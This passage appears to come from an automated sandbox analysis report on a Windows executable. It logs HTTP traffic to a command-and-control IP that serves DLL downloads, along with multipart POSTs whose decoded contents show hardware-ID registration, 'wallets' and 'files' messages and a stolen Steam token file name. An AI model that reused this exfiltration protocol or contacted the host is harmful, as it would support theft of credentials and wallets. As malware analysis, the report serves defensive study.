name="file"------AKJEGCFBGDHJJJJJKJEC--
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/freebl3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/mozglue.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/msvcp140.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/nss3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/softokn3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/vcruntime140.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJKEBKFCAAECAAAAAEHost: 185.172.128.151Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGHJKKJDHIEBFHCAKEHost: 185.172.128.151Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 65 62 30 30 63 32 35 66 37 30 38 30 62 36 37 30 62 39 36 65 36 63 35 65 64 39 64 30 39 31 61 66 35 61 35 39 64 35 33 66 61 34 33 35 36 64 35 36 34 66 65 61 65 65 64 37 32 65 36 35 34 32 35 37 32 37 38 30 36 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 48 4a 4b 4b 4a 44 48 49 45 42 46 48 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="token"39eb00c25f7080b670b96e6c5ed9d091af5a59d53fa4356d564feaeed72e65425727806b------IECGHJKKJDHIEBFHCAKEContent-Disposition: form-data; name="message"wallets------IECGHJKKJDHIEBFHCAKE--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKEHost: 185.172.128.151Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 65 62 30 30 63 32 35 66 37 30 38 30 62 36 37 30 62 39 36 65 36 63 35 65 64 39 64 30 39 31 61 66 35 61 35 39 64 35 33 66 61 34 33 35 36 64 35 36 34 66 65 61 65 65 64 37 32 65 36 35 34 32 35 37 32 37 38 30 36 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="token"39eb00c25f7080b670b96e6c5ed9d091af5a59d53fa4356d564feaeed72e65425727806b------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="message"files------FHCBGDAAFBKEBGDHDBKE--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDGHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJEHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGHJKKJDHIEBFHCAKEHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKEHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJEHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDGHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJEHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBFHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHCHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAFHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHCBGCBFHIIDHIJKFBHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAEHJJJKJKFIDGCBGIHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAFHost: 185.172.128.151Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBKJKFIECAAAKFBFBFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECAEHJJJKJKFIDGCBGIHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHCHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCGHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBKJKFIECAAAKFBFBFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBFHost: 185.172.128.151Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAHost: 185.172.128.151Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 65 62 30 30 63 32 35 66 37 30 38 30 62 36 37 30 62 39 36 65 36 63 35 65 64 39 64 30 39 31 61 66 35 61 35 39 64 35 33 66 61 34 33 35 36 64 35 36 34 66 65 61 65 65 64 37 32 65 36 35 34 32 35 37 32 37 38 30 36 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 2d 2d 0d 0a Data Ascii: ------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="token"39eb00c25f7080b670b96e6c5ed9d091af5a59d53fa4356d564feaeed72e65425727806b------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGIJKJJKEBGHJKFIDGCAContent-Disposition: form-data; name="file"------CGIJKJJKEBGHJKFIDGCA--
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 185.172.128.151Content-Length: 98031Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 185.172.128.151Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 65 62 30 30 63 32 35 66 37 30 38 30 62 36 37 30 62 39 36 65 36 63 35 65 64 39 64 30 39 31 61 66 35 61 35 39 64 35 33 66 61 34 33 35 36 64 35 36 34 66 65 61 65 65 64 37 32 65 36 35 34 32 35 37 32 37 38 30 36 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"39eb00c25f7080b670b96e6c5ed9d091af5a59d53fa4356d564feaeed72e65425727806b------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="message"jbdtaijovg------BAKFCBFHJDHJKECAKEHI--
Source: Joe Sandbox View IP Address: 185.172.128.151 185.172.128.151
Source: Joe Sandbox View ASN Name: NADYMSS-ASRU NADYMSS-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.151
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/sqlite3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/freebl3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/mozglue.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/msvcp140.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/nss3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/softokn3.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8420e83ceb95f3af/vcruntime140.dll HTTP/1.1Host: 185.172.128.151Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /7043a0c6a68d9c65.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGHHost: 185.172.128.151Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 43 38 37 30 38 45 43 41 43 39 33 37 34 30 31 30 35 32 38 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 48 2d 2d 0d 0a Data Ascii: ------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="hwid"A4C8708ECAC93740105281------AECAECFCAAEBFHIEHDGHContent-Disposition: form-data; name="build"default100------AECAECFCAAEBFHIEHDGH--
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151
Source: z2kQkLtyJW.exe, 00000000.00000002.2287329325.0000000030A00000.00000004.00000020.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php$~
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php(
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php1
Source: z2kQkLtyJW.exe, 00000000.00000002.2268391643.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.php356d564feaeed72e65425727806brelease
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpH
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpR~m
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpSI
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpdpoint
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpkIG
Source: z2kQkLtyJW.exe, 00000000.00000002.2287329325.0000000030A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phpo
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/7043a0c6a68d9c65.phprowser
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/freebl3.dll
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/freebl3.dllWp
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/mozglue.dll
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/mozglue.dllNW6
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/msvcp140.dll
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/nss3.dll
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/softokn3.dll
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/softokn3.dlleU
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/sqlite3.dll
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dll
Source: z2kQkLtyJW.exe, 00000000.00000002.2269753162.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dlltx
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
